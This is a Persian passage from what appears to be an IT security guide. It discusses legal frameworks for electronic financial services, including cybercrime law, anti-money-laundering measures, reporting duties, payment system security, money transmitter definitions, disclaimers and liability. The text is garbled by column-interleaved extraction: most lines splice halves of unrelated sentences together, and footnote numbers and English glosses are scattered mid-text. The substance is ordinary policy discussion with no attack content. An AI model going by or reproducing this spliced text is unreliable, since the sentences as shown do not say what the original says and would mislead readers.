‫ﺍﺯ ﻣﻬﻤﺘﺮﻳﻦ ﺍﺟﺰﺍﻱ ﻳﻚ ﭼﺎﺭﭼﻮﺏ ﻗﺎﻧﻮﻧﻲ ﻣﻨﺎﺳﺐ ﺑﺮﺍﻱ ﺧﺪﻣﺎﺕ‬
‫ﻫﺮ ﻛﺸﻮﺭ ﺑﺎﻳﺪ ﺩﺭ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺷﺒﻜﻪ ﻭ ﺭﺍﻳﺎﻧﻪ ﻛﻪ ﻣﻨﺠﺮ‬ ‫ﻣــﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺷﻨﺎﺳــﺎﻳﻲ ﺍﻋﺘﺒــﺎﺭ ﻗــﺎﻧﻮﻧﻲ ﺍﻣــﻀﺎﻫﺎﻱ‬
‫ﺑﻪ ﻭﺍﺭﺩ ﺁﻣﺪﻥ ﺧـﺴﺎﺭﺗﻬﺎﻱ ﺟـﺪﻱ ﺑـﻪ ﺧـﻮﺩ ﺷـﺒﻜﻪ ﻭ ﺭﺍﻳﺎﻧـﻪ ﻭ‬ ‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﺗﺮﺍﻛﻨﺸﻬﺎ‪ ،‬ﻭ ﻫﻤﭽﻨﻴﻦ ﺳﻮﺍﺑﻖ ﻣﺸﺘﺮﻳﺎﻥ ﻣﻲﺑﺎﺷـﺪ‪.‬‬
‫ﺑﺴﻴﺎﺭﻱ ﺁﺳﻴﺒﻬﺎﻱ ﺩﻳﮕﺮ ﻣﻲﺷﻮﺩ ﻗﻮﺍﻧﻴﻨﻲ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ‪ .‬ﻗـﺎﻧﻮﻥ‬ ‫ﭼﺎﺭﭼﻮﺏ ﻗﺎﻧﻮﻧﻲ ﺑﺎﻳﺪ ﺭﺍﻩﺣﻠﻬـﺎﻱ ﻓﻨـﻲ ﺭﺍ ﺗـﺮﺟﻴﺢ ﺩﻫـﺪ‪ ،‬ﺑـﺮﺍﻱ‬
‫ﻫﻤﭽﻨﻴﻦ ﺑﺎﻳﺪ ﺍﺑﺰﺍﺭ ﻭ ﻣﻨﺎﺑﻊ ﻻﺯﻡ ﺑﺮﺍﻱ ﺗﺤﻘﻴـﻖ ﻭ ﭘﻴﮕـﺮﺩ ﻭ ﻧﻴـﺰ‬ ‫ﻣﺸﺘﺮﻳﺎﻥ ﺩﺭ ﺍﻧﺠﺎﻡ ﻣﻌﺎﻣﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺣﻔﺎﻇﺖ ﺑﻮﺟـﻮﺩ ﺁﻭﺭﺩ‪،‬‬
‫ﻣﺠﺎﺯﺍﺕ ﻣﺮﺗﻜﺒﻴﻦ ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ ﺭﺍ ﺗﻌﻴﻴﻦ ﻛﺮﺩﻩ ﺑﺎﺷـﺪ‪ .‬ﻧﻤﻮﻧـﻪﺍﻱ‬ ‫ﻭ ﻗﺎﺑﻠﻴﺖ ﻓﻌﺎﻟﻴﺖ ﺩﺍﺧﻠﻲ ﺭﺍ ﺍﺭﺗﻘﺎ ﺑﺨﺸﺪ‪.‬‬
‫ﺍﺯ ﭼﻨﻴﻦ ﻗﻮﺍﻧﻴﻦ ﻭ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻳﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﻣﻌﺎﻫﺪﺓ ﺟﺮﺍﺋﻢ‬
‫ﺍﻳﻨﺘﺮﻧﺘﻲ ﺍﺭﻭﭘﺎ‪ ٣٢‬ﭘﻴﺪﺍ ﻛﺮﺩ ﻛﻪ ﺩﺭ ﻓﺼﻞ ﭼﻬـﺎﺭﻡ ﺑـﻪ ﺗﻔـﺼﻴﻞ ﺩﺭ‬ ‫ﻣﻌﺎﻣﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬
‫‪٣٣‬‬
‫ﻣﻮﺭﺩ ﺁﻥ ﺑﺤﺚ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬ ‫ﻗﺎﻧﻮﻥ ﻣﻌﺎﻣﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﻳﺪ ﻋﻨﻮﺍﻥ ﻛﻨﺪ ﻛﻪ ﻣﻨﻈﻮﺭ ﺍﺯ ﻳـﻚ‬
‫ﺍﻣﻀﺎ‪ ،‬ﺳﺎﺑﻘﻪ ﻳﺎ ﺗﺮﺍﻛﻨﺶ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﭼﻴﺴﺖ ﻭ ﺑﺎ ﺍﻳﻨﻜﺎﺭ ﺍﻋﺘﺒـﺎﺭ‬
‫ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺷﺴﺘﺸﻮﻱ ﭘﻮﻝ‬
‫ﻗﺎﻧﻮﻧﻲ ﻫﺮ ﻋﻨﺼﺮ ﺭﺍ ﻣﺸﺨﺺ ﻧﻤﺎﻳﺪ‪ .‬ﺍﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﺧـﺼﻮﺻﹰﺎ ﺩﺭ‬
‫ﺳﻴﺎﺳﺘﻬﺎ ﺑﺎﻳﺪ ﺭﻭﺷﻬﺎﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺷﺴﺘﺸﻮﻱ ﭘﻮﻝ ﺭﺍ ﺗﻌﺮﻳﻒ ﻛﻨﻨﺪ‬ ‫ﺗﻌﺮﻳﻒ ﺍﻣﻀﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺎﻳﺪ ﺑﺴﻴﺎﺭ ﺩﻗﻴﻖ ﺑﺎﺷﻨﺪ‪ .‬ﺗﻌﺎﺭﻳﻒ ﺗـﺎ‬
‫ﻭ ﺟﻮﺍﻣــﻊ ﺑــﻴﻦﺍﻟﻤﻠﻠــﻲ ﺭﺍ ﺑــﻪ ﻫﻤﻜــﺎﺭﻱ ﺩﺭ ﺑﺎﺯﺭﺳــﻲ‪ ،‬ﭘﻴﮕــﺮﺩ ﻭ‬ ‫ﺣﺪ ﺍﻣﻜﺎﻥ ﺑﺎﻳﺪ ﺧﺼﻮﺻﻴﺎﺕ ﻓﻨﻲ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ ﺗـﺎ ﺭﺍﻩﺣﻠﻬـﺎﻱ‬
‫ﻣﺨﺘﻠﻒ ﺑﺘﻮﺍﻧﻨﺪ ﻭﺍﺭﺩ ﺑﺎﺯﺍﺭ ﺷﻮﻧﺪ‪.‬‬
‫‪31‬‬ ‫‪Cyber Crime‬‬
‫‪32‬‬ ‫‪Europe’s Convention on Cyber Crime‬‬
‫ﺍﻧﺠﻤﻦ ﺟﺮﺍﺋﻢ ﺳﺎﻳﺒﺮ ﺷﻮﺭﺍﻱ ﺍﺭﻭﭘﺎ‪:‬‬ ‫‪۳۳‬‬
‫‪http://conventions.coe.int‬‬
‫‪١٣١‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﺟﺮﻳــﺎﻥ ﺩﺍﺭﺩ ﺗــﺄﺛﻴﺮ ﺑــﺴﺰﺍﻳﻲ ﺑــﺮ ﺳﻴــﺴﺘﻢ ﭘﺮﺩﺍﺧــﺖ ﺟﻬــﺎﻧﻲ‪،‬‬ ‫ﻣﺠﺎﺯﺍﺕ ﭼﻨﻴﻦ ﺟﺮﺍﺋﻤﻲ ﺗﺸﻮﻳﻖ ﻧﻤﺎﻳﻨﺪ ﺗﺎ ﺧﻄﺮ ﺗﻬﺪﻳﺪﺍﺕ ﻣﻮﺟﻮﺩ‬
‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﭘﻮﻟﻲ‪ ،‬ﻭ ﭘﻴﺶﺑﻴﻨﻴﻬﺎﻱ ﺍﻗﺘﺼﺎﺩﻱ ﺩﺍﺭﺩ‪.‬‬ ‫ﺍﺯ ﺟﺎﻧﺐ ﺷﺴﺘﺸﻮﻱ ﭘﻮﻝ ﻛﻪ ﺑﻪ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺟﺪﻳـﺪ ﻧﻴـﺰ ﺳـﺮﺍﻳﺖ‬
‫ﻛﺮﺩﻩ ﺭﺍ ﻛﺎﻫﺶ ﺩﻫﻨﺪ‪.‬‬
‫ﺍﻟﺰﺍﻣﺎﺕ ﮔﺰﺍﺭﺵﺩﻫﻲ‬
‫ﺍﺟﺮﺍﻱ ﻗﺎﻧﻮﻥ‬
‫ﻧﺎﺗﻮﺍﻧﻲ ﺩﺭ ﺗﻬﻴﺔ ﮔﺰﺍﺭﺵ ﺍﺯ ﻭﻗﺎﻳﻊ ﺍﻣﻨﻴﺘﻲ ﺑﻮﻳﮋﻩ ﺩﺭ ﺣﻮﺯﺓ ﺧﺪﻣﺎﺕ‬
‫ﻣﺎﻟﻲ ﺑﺮﺍﻱ ﻛﺴﺎﻧﻴﻜﻪ ﺑﺪﻭﻥ ﺍﻧﺠﺎﻡ ﺑﺮﺭﺳﻲ ﻭ ﭘﻴـﺸﮕﻴﺮﻳﻬﺎﻱ ﻻﺯﻡ‬ ‫ﺷﺎﻳﺪ ﺑﺘﻮﺍﻥ ﮔﻔﺖ ﻛﻪ ﻧﻴﺎﺯ ﺑﻪ ﺍﺟﺮﺍﻱ ﻗﻮﺍﻧﻴﻦ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﺍﺣﺘﻤﺎﻝ ﺗﺪﺍﻭﻡ ﺑﻴـﺸﺘﺮ‬ ‫ﺩﺭ ﻣﺮﺯﻫﺎﻱ ﻳﻚ ﻛﺸﻮﺭ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻭﺟﻮﺩ ﭼﺎﺭﭼﻮﺏ ﻗـﺎﻧﻮﻧﻲ ﺁﻥ ﺍﺯ‬
‫ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻧﺎﻣﻄﻤﺌﻦ ﻭ ﻧﺎﺩﺭﺳﺖ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻭﺍﺭﺩ ﺁﻣﺪﻥ ﺧـﺴﺎﺭﺍﺕ‬ ‫ﺍﻫﻤﻴﺖ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ‪ .‬ﻣﺒﺪﺃ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻧﻮﺍﻉ ﺣﻤﻼﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ‪،‬‬
‫ﺑﻴﺸﺘﺮ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﻣﻲﺩﻫﺪ‪ .‬ﻳﻚ ﺭﺍﻫﻜﺎﺭ ﻣﻲﺗﻮﻧﺪ ﺍﻳـﻦ ﺑﺎﺷـﺪ ﻛـﻪ‬ ‫ﻛﺸﻮﺭﻫﺎﻳﻲ ﺑﻮﺩﻩﺍﻧﺪ ﻛﻪ ﻧﻈﺎﻡ ﻗﺎﻧﻮﻧﻲ ﻭ ﺍﺟﺮﺍﻳـﻲ ﺿـﻌﻴﻔﻲ ﺑـﺮﺍﻱ‬
‫ﻭﻇﻴﻔﺔ ﺗﻬﻴﺔ ﮔﺰﺍﺭﺵ ﺍﺯ ﻭﻗﺎﻳﻊ ﺑﺮ ﻋﻬﺪﺓ ﻣﺄﻣﻮﺭﺍﻥ ﺍﺟﺮﺍﻳﻲ ﮔـﺬﺍﺭﺩﻩ‬ ‫ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺍﺷـﺘﻪﺍﻧـﺪ ﻭ ﻫﻤـﻴﻦ ﺍﻣـﺮ ﺿـﺮﻭﺭﺕ ﻭﺟـﻮﺩ‬
‫‪٣٦‬‬
‫ﺷﻮﺩ‪.‬‬ ‫ﺭﺍﻫﻜﺎﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ ﻫﻤﻜﺎﺭﻳﻬﺎﻱ ﺑـﻴﻦﺍﻟﻤﻠﻠـﻲ ﺭﺍ ﺑـﻴﺶ ﺍﺯ ﭘـﻴﺶ‬
‫ﻧﻤﺎﻳﺎﻥ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﭘﻴﺸﮕﺎﻣﺎﻥ ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ‬
‫ﺵ ﻧﻈﺎﺭﺕ ﻭ ﺍﺟﺮﺍﻱ ﻗـﺎﻧﻮﻥ‬ ‫ﻲ ﮔﺴﺘﺮ ﹺ‬ ‫ﻗﺎﻧﻮﻧﮕﺬﺍﺭﺍﻥ ﺑﺎﻳﺪ ﺑﻪ ﭼﮕﻮﻧﮕ ﹺ‬ ‫ﺭﻛﻦ ﺩﻭﻡ‪:‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﻝ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗﻮﺟﻪ ﻛﻨﻨﺪ‪ .‬ﺍﻭﻟـﻴﻦ ﺩﻟﻴﻠـﻲ ﻛـﻪ‬‫ﻞ ﺍﻧﺘﻘﺎ ﹺ‬


‫ﺑﺮﺍﻱ ﻭﺳﺎﻳ ﹺ‬ ‫ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ‬
‫ﺑﻴﺸﺘ ﹺﺮ ﻣﺮﺩﻡ ﺑﺮﺍﻱ ﻋﺪﻡ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻭﺳﺎﻳﻞ ﺍﻧﺘﻘﺎﻝ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺮﺩﺍﺧﺖ ﺟﺰﺀ ﻣﻬﻤﻲ ﺍﺯ ﻫﺮ ﺳﻴﺴﺘﻢ ﻣﺎﻟﻲ ﻣﺤـﺴﻮﺏ‬
‫ﺁﻥ ﻧﺎﻡ ﻣﻲﺑﺮﻧﺪ ﻫﺮﺍﺱ ﺍﺯ ﺗـﺄﻣﻴﻦﻧﺒـﻮﺩﻥ ﺣﻔﺎﻇـﺖ ﻛـﺎﻓﻲ ﺑـﺮﺍﻱ‬
‫ﻣﻲﺷﻮﻧﺪ‪ .‬ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ ﻛﺎﻫﺶ ﻣﺨﺎﻃﺮﺍﺕ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﺍﻃﻼﻋﺎﺕ ﺍﺳﺖ‪ .‬ﺣﻔﺎﻇـﺖ ﺻـﺤﻴﺢ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑﺎﻋـﺚ ﺍﻓـﺰﺍﻳﺶ‬
‫ﭘﺮﺩﺍﺧﺖ ﺗﺪﻭﻳﻦ ﻣﻲﺷﻮﻧﺪ ﺑﺎﻳﺪ ﺑﮕﻮﻧﻪﺍﻱ ﺑـﺮﺍﻱ ﭘـﻨﺞ ﻣـﻮﺭﺩ ﺯﻳـﺮ‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﻣﺼﺮﻑﻛﻨﻨﺪﻩ ﻭ ﺗﻘﻮﻳﺖ ﻧﻈـﻢ ﺑـﺎﺯﺍﺭ ﺷـﻮﺩ ﻭ ﺩﺭﻧﺘﻴﺠـﻪ‬
‫ﺭﺍﻩﺣﻠﻲ ﺍﺭﺍﺋﻪ ﺩﻫﻨﺪ‪:‬‬
‫ﺯﻣﻴﻨﻪ ﺭﺍ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﺑﻴﺸﺘﺮ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺎﻟﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﻓﺮﺍﻫﻢ ﺳﺎﺯﺩ‪.‬‬ ‫ﺗﻌﺮﻳﻒ ﺍﻧﺘﻘﺎﻝﺩﻫﻨﺪﮔﺎﻥ ﭘﻮﻝ؛‬ ‫‪.۱‬‬
‫ﺍﻟﺰﺍﻣﺎﺕ ﮔﺰﺍﺭﺵﺩﻫﻲ؛‬ ‫‪.۲‬‬
‫ﺿﻤﺎﻧﺘﻨﺎﻣﻪﻫﺎﻱ ﺟﺒﺮﺍﻥ ﺧﺴﺎﺭﺍﺕ‬ ‫ﺿﻮﺍﺑﻂ؛‬ ‫‪.۳‬‬
‫ﻣﺆﺳﺴﺎﺕ ﻣﺎﻟﻲ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺧـﺪﻣﺎﺕ ﺑﻌـﺪ ﺍﺯ ﻓـﺮﻭﺵ ﻭ ﺟﺒـﺮﺍﻥ‬ ‫ﺿﻤﺎﻧﺘﻨﺎﻣﻪﻫﺎ‪ ،‬ﺟﺒﺮﺍﻥ ﺧﺴﺎﺭﺍﺕ‪ ،‬ﻭ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ؛ ﻭ‬ ‫‪.۴‬‬
‫ﺧﺴﺎﺭﺕ ﺭﺍ ﺑﺮﺍﻱ ﺷﺮﻛﺘﻬﺎﻱ ﺗﺠﺎﺭﻱ ﻛﻪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻭ ﺳـﺨﺖﺍﻓـﺰﺍﺭ‬ ‫ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ‪.‬‬ ‫‪.۵‬‬
‫ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﻨﺪ ﺍﻟﺰﺍﻣﻲ ﻧﻤﺎﻳﻨﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺷﺮﻛﺘﻬﺎ ﺭﺍ ﺑـﻪ‬
‫ﺗﻌﺮﻳﻒ ﺍﻧﺘﻘﺎﻝﺩﻫﻨﺪﺓ ﭘﻮﻝ‬
‫ﻋﺮﺿﺔ ﻣﺤﺼﻮﻻﺗﻲ ﻣﻠﺰﻡ ﻛﻨﻨﺪ ﻛﻪ ﺩﺭ ﻣﻘﺎﺑﻞ ﺁﺳﻴﺒﻬﺎﻱ ﺍﺣﺘﻤـﺎﻟﻲ‬
‫ﻧﺎﺷﻲ ﺍﺯ ﺭﺧﻨﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﻭ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻱ ﻣﻘـﺎﻭﻡ‬ ‫ﺍﻧﺘﻘﺎﻝﺩﻫﻨﺪﺓ ﭘﻮﻝ ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ ﻫﺮ ﺳـﺎﺯﻣﺎﻥ ﺗﺠـﺎﺭﻱ ﻛـﻪ ﺩﺭ‬
‫ﺑﺎﺷﻨﺪ‪ .‬ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﭼﻨﻴﻦ ﺧﺪﻣﺎﺕ ﻳـﺎ ﻣﺤـﺼﻮﻻﺗﻲ ﺭﺍ ﺑـﺮﺍﻱ‬ ‫ﺯﻣﻴﻨﺔ ﺍﻧﺘﻘﺎﻝ ﻭ ﺗﺒﺎﺩﻝ ﺍﺭﺯ ﻭ ﻟﻮﺍﺯﻡ ﭘﻮﻟﻲ ﻣﺸﻐﻮﻝ ﻓﻌﺎﻟﻴﺖ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﺻﻨﻌﺖ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺣﻔـﺎﻇﺘﻲ‬ ‫ﻻ ﺍﻳﻦ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﻪ "ﺗﺠﺎﺭﺕ ﺧﺪﻣﺎﺕ ﭘﻮﻟﻲ" ﻣﺸﻐﻮﻝ ﻫﺴﺘﻨﺪ‬ ‫ﻣﻌﻤﻮ ﹰ‬
‫‪٣٤‬‬
‫ﻣﺴﺘﺤﻜﻢﺗﺮﻱ ﺭﺍ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨـﺪ ﻭ ﺧـﻮﺩ ﺭﺍ ﻣﻠـﺰﻡ‬ ‫ﻭ ﺑﻌﻨــﻮﺍﻥ ﺩﻓــﺎﺗﺮ ﺗــﺴﻮﻳﻪ ﺧﻮﺩﻛــﺎﺭ ﺷــﺨﺺ ﺛﺎﻟــﺚ ﻓﻌﺎﻟﻴــﺖ‬
‫ﻣﻲﺩﺍﻧﻨﺪ ﺫﻛﺮ ﻧﻤﺎﻳﻨﺪ ﻛﻪ ﻣﺤﺼﻮﻟـﺸﺎﻥ ﺑـﺮﺍﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﺩﺭ ﻳـﻚ‬ ‫ﻣﻲﻛﻨﻨﺪ‪ ٣٥.‬ﺩﺭ ﺑﺮﺭﺳﻲ ﺍﻣﻨﻴـﺖ ﺳﻴـﺴﺘﻢ ﭘﺮﺩﺍﺧـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‪،‬‬
‫ﺑﺨﺶ ﺧﺎﺹ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻧﺸﺪﻩ ﻭ ﻳـﺎ ﻣﻨﺎﺳـﺐ ﻧﻴـﺴﺖ‪ .‬ﻳﻜـﻲ ﺍﺯ‬ ‫ﻗﺎﻧﻮﻧﮕﺬﺍﺭﺍﻥ ﺑﺎﻳﺪ ﺑﺪﺍﻧﻨﺪ ﻛﻪ ﺍﻟﮕﻮﻳﻲ ﺟﺪﻳﺪ ﺑﺮﺍﻱ ﺟﻨﺒﺶ ﭘﻮﻟﻲ ﺩﺭ‬
‫ﺭﺍﻩﺣﻠﻬﺎ ﺑﺮﺍﻱ ﺍﻳﻦ ﻫﻤﺔ ﺍﻳـﻦ ﻣـﻮﺍﺭﺩ ﻗـﺮﺍﺭﺩﺍﺩﻥ ﻳـﻚ ﻳﺎﺩﺩﺍﺷـﺖ‬ ‫ﻣﺤﻴﻄﻬﺎﻱ ﭘﻴﭽﻴﺪﺓ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺍﺳﺖ‪ .‬ﺣﺠـﻢ‬
‫ﺳﻠﺐ ﻣﺴﺆﻟﻴﺖ‪ ٣٧‬ﺑﺮ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻳﺎ ﺳﺨﺖﺍﻓـﺰﺍﺭ ﺍﺳـﺖ ﻛـﻪ ﺍﻇﻬـﺎﺭ‬ ‫ﻗﺎﺑﻞ ﺗﻮﺟﻪ ﭘﻮﻟﻲ ﻛﻪ ﺑﺠـﺎﻱ ﺩﺍﺧـﻞ ﺑﺎﻧﻜﻬـﺎ ﺩﺭ ﺍﻃـﺮﺍﻑ ﺑﺎﻧﻜﻬـﺎ‬

‫‪34‬‬ ‫‪Third-Party Automated Clearinghouse‬‬


‫ﺧﺼﻮﺻﹰﺎ ﻣﺪﻳﺮﺍﻥ ﺍﺭﺷﺪ ﺍﻃﻼﻋﺎﺕ ﻭ ﻣﺪﻳﺮﺍﻥ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ‬ ‫‪۳۶‬‬ ‫ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﺩﺭﻳﺎﻓﺖ ﻭ ﺍﻧﺘﻘﺎﻝ ﭘﻮﻝ‪ ،‬ﺗﺒـﺪﻳﻞ‬ ‫‪۳۵‬‬
‫‪37‬‬ ‫‪Disclaimer Note‬‬ ‫ﺳﺮﻣﺎﻳﻪ‪ ،‬ﻭ ﺳﺎﻳﺮ ﻣﻮﺍﺭﺩ ﻣﺸﺎﺑﻪ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﺩ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٣٢‬‬

‫ﻣﺨﺎﻃﺮﺍﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﻪ ﺩﺭ ﭼﺎﺭﭼﻮﺏ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻳﻬﺎﻱ ﻣﻮﺟﻮﺩ‬ ‫ﻣﻲﺩﺍﺭﺩ ﺍﻳﻦ ﻣﺤﺼﻮﻝ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ‪ ،‬ﺍﻧﺘﻘﺎﻝ ﻳﺎ ﺫﺧﻴـﺮﺓ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﻧﺸﺪﻩﺍﻧـﺪ )ﻣﺜـﻞ ﺗﺨﺮﻳـﺐ ﺳـﺮﻭﻳﺲ ﻳـﺎ ﺳـﺮﻗﺖ ﻫﻮﻳـﺖ(‬ ‫ﻏﻴﺮﻣﺠـــﺎﺯ‪ ،‬ﺣـــﺴﺎﺱ ﻳـــﺎ ﻣﺤﺮﻣﺎﻧـــﻪ ﻧﺒﺎﻳـــﺪ ﺑﻜـــﺎﺭ ﺭﻭﺩ ﻭ ﺩﺭ‬
‫ﺗﺮﻏﻴﺐ ﻳـﺎ ﻣﻠـﺰﻡ ﻧﻤﺎﻳﻨـﺪ‪ .‬ﺍﺯ ﺁﻧﺠـﺎ ﻛـﻪ ﺻـﻨﻌﺖ ﺑﻴﻤـﺔ ﺑﺨـﺶ‬ ‫ﻏﻴﺮﺍﻳﻨﺼﻮﺭﺕ ﻫﻴﭻ ﻣﺴﺌﻮﻟﻴﺘﻲ ﻣﺘﻮﺟـﻪ ﭘﺪﻳﺪﺁﻭﺭﻧـﺪﺓ ﺁﻥ ﻧﺨﻮﺍﻫـﺪ‬
‫ﺧﺼﻮﺻﻲ ﺩﺭ ﺍﻳﻦ ﺣﻮﺯﻩ ﻓﻌﺎﻟﺘﺮ ﺷﺪﻩ‪ ،‬ﺍﻳﻦ ﺭﻭﺵ ﺑـﻴﺶ ﺍﺯ ﭘـﻴﺶ‬ ‫ﺑﻮﺩ‪.‬‬
‫ﻋﻤﻠﻲ ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ ﻭ ﻣﻲﺗﻮﺍﻧﺪ ﺑـﻪ ﺳـﻼﻣﺖ ﻋﻤـﻮﻣﻲ ﺻـﻨﻌﺖ‬
‫‪٤٠‬‬
‫ﺑﻴﻤﻪ ﻭ ﺳﺎﺧﺘﺎﺭ ﺁﻥ ﺩﺭ ﺑﺎﺯﺍﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﻣﻨﺠﺮ ﺷﻮﺩ‪.‬‬ ‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ‬
‫ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺑﻪ ﺻﻨﻌﺖ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻧﺴﺒﺖ‬
‫ﻣﺴﺌﻮﻟﻴﺖ‬
‫ﺑﻪ ﺗﺄﻣﻴﻦﻛﻨﻨﺪﮔﺎﻥ ﺧـﺪﻣﺎﺗﻲ ﻛـﻪ ﻣـﺴﺘﻘﻴﻤﹰﺎ ﺑـﺎ ﺍﻳـﻦ ﺻـﻨﻌﺖ ﺩﺭ‬
‫ﭼﺎﺭﭼﻮﺏ ﺣﻘـﻮﻗﻲ ﻭ ﻗـﺎﻧﻮﻧﻲ ﻣـﻲﺗﻮﺍﻧـﺪ ﺍﻧﮕﻴـﺰﻩﻫـﺎﻳﻲ ﺭﺍ ﺑـﺮﺍﻱ‬ ‫ﺍﺭﺗﺒﺎﻁ ﻧﻴﺴﺘﻨﺪ‪ ،‬ﺍﺯ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻣﺴﺘﺤﻜﻢﺗﺮﻱ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ‪ .‬ﺑـﺎﺭ‬
